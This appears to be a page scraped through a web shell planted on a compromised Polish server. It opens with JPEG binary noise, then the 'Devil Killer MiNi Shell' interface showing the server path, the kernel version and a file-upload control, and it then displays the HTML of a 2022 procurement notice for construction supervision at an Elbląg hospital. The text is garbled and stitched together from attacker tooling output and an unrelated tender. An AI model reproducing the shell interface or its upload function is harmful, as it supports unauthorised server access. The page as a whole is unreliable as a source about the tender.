JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220628/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220628/0022720201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa pełnienia funkcji Inżyniera kontraktu wraz z kompleksowym nadzorem inwestorskim w ramach projektu pn: „Podniesienie jakości i kompleksowości leczenia poprzez konsolidację usług zdrowotnych(…)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY OŚRODEK REHABILITACYJNO-TERAPEUTYCZNY DLA DZIECI I MŁODZIEŻY W ELBLĄGU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170789323</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Królewiecka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpitalmiejski.elblag.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spor-t.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> SPZOZ </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa pełnienia funkcji Inżyniera kontraktu wraz z kompleksowym nadzorem inwestorskim w ramach projektu pn: „Podniesienie jakości i kompleksowości leczenia poprzez konsolidację usług zdrowotnych(…)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e251f8a3-f6bc-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00227202</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia realizowany jest z dofinansowaniem w ramach Regionalnego Programu Operacyjnego Województwa Warmińsko-Mazurskiego na lata 2014-2020, Oś priorytetowa 9. Dostęp do wysokiej jakości usług publicznych, Działanie 9.1 Infrastruktura ochrony zdrowia, Poddziałanie 9.1.2 Infrastruktura ochrony zdrowia w miejskim obszarze funkcjonalnym Elbląga. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpitalmiejski_elblag <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpitalmiejski_elblag</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja między Zamawiającym, a Wykonawcami odbywać się będzie się drogą elektroniczną przy użyciu platformy zakupowej https://platformazakupowa.pl/pn/szpitalmiejski_elblag <br/>2.	Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert, odbierani dokumentów elektronicznych, zmiana lub wycofanie oferty oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3.	Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”. <br/>4.	Zalecenia: <br/>a)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf <br/>b)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: − .zip − .7Z <br/>c)	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. <br/>d)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. <br/>e)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>f)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. <br/>g)	Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. <br/>h)	Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. <br/>i)	Jeśli Wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Państwa danych osobowych jest Szpital Miejski św. Jana Pawła II w Elblągu, ul. Komeńskiego 35, 82-300 Elbląg;<br/>	inspektorem ochrony danych osobowych w Szpitalu Miejskim św. Jana Pawła II w Elblągu jest Pan Waldemar Adamowicz, tel. (od godz. 13:30) 55 239 44 49, e-mail: abi-ess@softel.com.pl;<br/>	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/>z postępowaniem o udzielenie nn. zamówienia publicznego;<br/>	odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019), dalej „ustawa Pzp”; <br/>	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiadacie Państwo:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznacie Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	nie przysługuje Państwu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/15/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Uwaga: Zadanie inwestycyjne w trakcie realizacji.<br/>Przedmiotem zamówienia jest pełnienie obowiązków Inżyniera Kontraktu podczas realizacji zadania inwestycyjnego pn.: „Podniesienie jakości i kompleksowości leczenia poprzez konsolidację usług zdrowotnych w zakresie lecznictwa zachowawczego i zabiegowego w Szpitalu Miejskim św. Jana Pawła ll w Elblągu”, składającego się z następujących zadań inwestycyjnych:<br/><br/>1.	Pełnienie obowiązków Inżyniera Kontraktu podczas rozbudowy budynku Szpitala Miejskiego św. Jana Pawła II w Elblągu poprzez rozbudowę bloku operacyjnego do budynku szpitala przy ul. Komeńskiego w związku z konsolidacją szpitali miejskich i reorganizacją oddziałów zabiegowych. Planowana inwestycja przewiduje dobudowanie do istniejącego budynku Szpitala Miejskiego św. Jana Pawła II w Elblągu nowoczesnego pawilonu bloku operacyjnego z 5 salami operacyjnymi (z wyposażeniem) wraz z pomieszczeniami przygotowania pacjenta i personelu, centralną sterylizatornią (z wyposażeniem) oraz z zapleczem i magazynem dla nowoprojektowanego bloku operacyjnego, salą opieki pooperacyjnej wraz z zapleczem - połączonego z budynkiem szpitala trzykondygnacyjnym łącznikiem komunikacyjnym z dwoma dźwigami w wykonaniu szpitalnym. Zadanie inwestycyjne w trakcie realizacji. Wykonano następujący zakres robót budowlanych: <br/>1.1	Stan surowy<br/>•	Wykop pod budynek<br/>•	Fundamenty<br/>•	Kanał techniczny<br/>•	Izolacje fundamentów, kanału<br/>•	Ściany betonowe<br/>•	Ściany murowane<br/>•	Słupy żelbetowe<br/>•	Podciągi, nadproża, wieńce<br/>•	Stropy żelbetowe<br/>•	Pokrycie stropodachu z ociepleniem<br/>•	Odwodnienie dachu<br/>•	Instalacja odgromowa – montaż uziomów fundamentowych<br/>•	System asekuracji na dachu<br/>1.2	Roboty wykończeniowe wewnętrzne<br/>•	Ścianki działowe murowane<br/>•	Stolarka drzwiowa i okienna zewnętrzna<br/>•	Kanalizacja podposadzkowa<br/>•	Podłoża pod posadzki<br/>1.3	Roboty wykończeniowe zewnętrzne<br/>•	Elewacja (bez tynku na cokole - 83%)<br/>1.4	Elementy zewnętrzne<br/>•	Daszki nad drzwiami<br/>1.5	Wycinka drzew pod budowę<br/>1.6	Na dachu wykonano podstawy dachowe pod wentylatory, kominki do odpowietrzenia kanalizacji, wyłazy dachowe.<br/><br/>2.	Pełnienie obowiązków Inżyniera Kontraktu podczas „Modernizacji oddziałów szpitalnych Szpitala Miejskiego św. Jana Pawła II w Elblągu w związku z konsolidacją szpitali miejskich i reorganizacją oddziałów zabiegowych” w ramach projektu: „Podniesienie jakości i kompleksowości leczenia poprzez konsolidację usług zdrowotnych w zakresie lecznictwa zachowawczego i zabiegowego w Szpitalu Miejskim Św. Jana, Pawła II w Elblągu”. Planowana inwestycja przewiduje modernizację 4 oddziałów szpitalnych Szpitala Miejskiego św. Jana Pawła II w Elblągu. Zadanie inwestycyjne w trakcie realizacji.<br/>2.1 w budynku szpitala przy ul. Komeńskiego 35:<br/>a)	Modernizacja pomieszczeń dla potrzeb oddziału pediatrycznego dzieci starszych – skrzydło „D”, parter. Zadanie inwestycyjne nierozpoczęte. <br/>b)	Modernizacja pomieszczeń dla potrzeb oddziału pediatrycznego dzieci młodszych – skrzydło „E”, parter. Zadanie inwestycyjne nierozpoczęte. <br/>c)	Zakończenie zadań związanych z rozliczeniem prac dotyczących oddziału Chirurgii Dziecięcej<br/>2.2 w budynku szpitala przy ul. Żeromskiego 22<br/>a)	Modernizacja pomieszczeń dla potrzeb oddziału rehabilitacji kardiologicznej – skrzydło prawe – I piętro. Zadanie inwestycyjne w trakcie realizacji. Wykonano następujący zakres robót budowlanych :<br/>•	Branża architektoniczno-budowlana : <br/>Roboty rozbiórkowe 100% (rozebranie posadzek, wyburzenia ścianek, demontaż stolarki drzwiowej wewnętrznej, przebicia otworów drzwiowych, skucie tynków wewnętrznych/glazury na ścianach). Roboty konstrukcyjne (wykonanie nadproży 98%, poszerzenia otworów i przemurowania). Wykonanie sufitów p.poż. na stropie drewnianym: 100%. Ścianki działowe: 75%<br/>•	Branża sanitarna : demontaż urządzeń sanitarnych 100%.<br/>•	Branża elektryczna : demontaż osprzętu elektrycznego i instalacji elektrycznej 100%, montaż instalacji elektrycznej (okablowanie) 15%, prace teletechniczne (demontaż i zabezpieczenie istniejącej sieci IT i montaż ) 3%.<br/>b)	Modernizacja pomieszczeń dla potrzeb oddziału psychiatrycznego – II piętro – cała kondygnacja. Zadanie inwestycyjne w trakcie realizacji. Zadanie inwestycyjne w trakcie realizacji. Wykonano następujący zakres robót budowlanych :<br/>•	Branża architektoniczno-budowlana : Roboty rozbiórkowe (rozebranie posadzek 100%, wyburzenia ścianek 100%, demontaż stolarki drzwiowej wewnętrznej100%, przebicia otworów drzwiowych 80%, skucie glazury na ścianach 100%). Roboty konstrukcyjne (wykonanie nadproży 80%, poszerzenia otworów i przemurowania).<br/>•	Branża sanitarna : demontaż urządzeń sanitarnych 100%. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena	60<br/>2.	Doświadczenie zawodowe Koordynatora Projektu w prowadzeniu nadzorów technicznych nad robotami budowlanymi	40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca zobowiązany jest do dysponowania ubezpieczeniem odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie niższą niż 1.000.000,00 zł<br/><br/>Uwaga:<br/>Wykonawca jest zobowiązany przedstawić Zamawiającemu najpóźniej w dniu podpisania umowy, obowiązującą umowę ubezpieczenia od odpowiedzialności cywilnej za szkody wyrządzone na mieniu lub na osobie, także obejmującej czyste straty finansowe powstałe w związku z realizacją prac/czynności określonych w niniejszej umowie, szkody powstałe z tytułu niewykonania lub nienależytego wykonania niniejszej umowy na łączną kwotę nie niższą niż 1.000.000,00 zł na jedno lub wszystkie zdarzenia w okresie ubezpieczenia.<br/><br/>Ocenę spełniania w/w warunku Zamawiający dokona na podstawie oświadczenia – wg wzoru stanowiącego odpowiednio Załącznik Nr 9.<br/><br/>4) zdolności technicznej lub zawodowej:<br/>1)	Wykonawca spełni warunek jeżeli wykaże że wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie usługi pełnienia funkcji Inżyniera Kontraktu*) na inwestycjach o łącznej wartości nie niższej niż 15 000 000,00 PLN brutto przy budowie lub przebudowie budynku wraz z instalacjami i urządzeniami oraz zarządzaniu i nadzorowaniu inwestycji budowlanych kubaturowych.<br/><br/>*) w przypadku użycia innego określenia niż „Inżynier Kontraktu” dotyczącego wykonanej usługi, zakres zrealizowanych usług musi w swoim zakresie zawierać co najmniej:<br/>-	nadzór techniczny nad robotami budowlanymi i jakością ich wykonywania,<br/>-	nadzór nad całością dokumentacji sporządzanej przez wykonawcę,<br/>-	sprawowanie kontroli prawidłowości stosowania przepisów ustawy Pzp.<br/><br/>Ocenę spełniania w/w warunku Zamawiający dokona na podstawie informacji zawartych w wykazie usług – wg wzoru stanowiącego odpowiednio Załącznik Nr 7.<br/><br/>2)	Wykonawca spełni warunek jeżeli wykaże że dysponuje osobami zdolnymi do wykonania zamówienia, tj.: <br/><br/>a)	Koordynatorem Projektu, który okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, pełnił funkcję Koordynatora Projektu*) na min. 2 inwestycjach budowlanych kubaturowych.<br/><br/>*) w przypadku użycia innego określenia niż „Koordynator Projektu” dotyczącego wykonanych usług, zakres zrealizowanych usług musi w swoim zakresie zawierać co najmniej:<br/>-	nadzór techniczny nad robotami budowlanymi i jakością ich wykonywania,<br/>-	nadzór nad całością dokumentacji sporządzanej przez wykonawcę,<br/>-	sprawowanie kontroli prawidłowości stosowania przepisów ustawy Pzp.<br/><br/>Uwaga:<br/>Koordynator Projektu może pełnić funkcję Inspektora nadzoru branży konstrukcyjno-budowlanej z jednoczesnym pełnieniem obowiązków Koordynatora Projektu. Może on również pełnić funkcje innych inspektorów nadzoru, o których mowa w § 3 ust. 1 pkt. 1.3 Umowy.<br/><br/>b)	Inspektorem nadzoru branży konstrukcyjno–budowlanej bez ograniczeń z uprawnieniami budowlanymi o specjalności konstrukcyjno-budowlanej bez ograniczeń z wykształceniem wyższym technicznym i co najmniej 5 letnim doświadczeniem jako inspektor nadzoru swojej branży przy budowie lub przebudowie obiektów budowlanych kubaturowych oraz posiada uprawnienia i doświadczenie oraz spełnia wymogi, o których mowa w art. 37c ustawy o ochronie zabytków i opiece nad zabytkami (Dz.U. z 2014 r. poz. 1446), tj.: posiada doświadczenie co najmniej 18 miesięczne w kierowaniu robotami budowlanymi prowadzonymi przy zabytkach nieruchomych wpisanych do rejestru zabytków nieruchomych,<br/><br/>c)	Inspektorem nadzoru branży sanitarnej z uprawnieniami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, 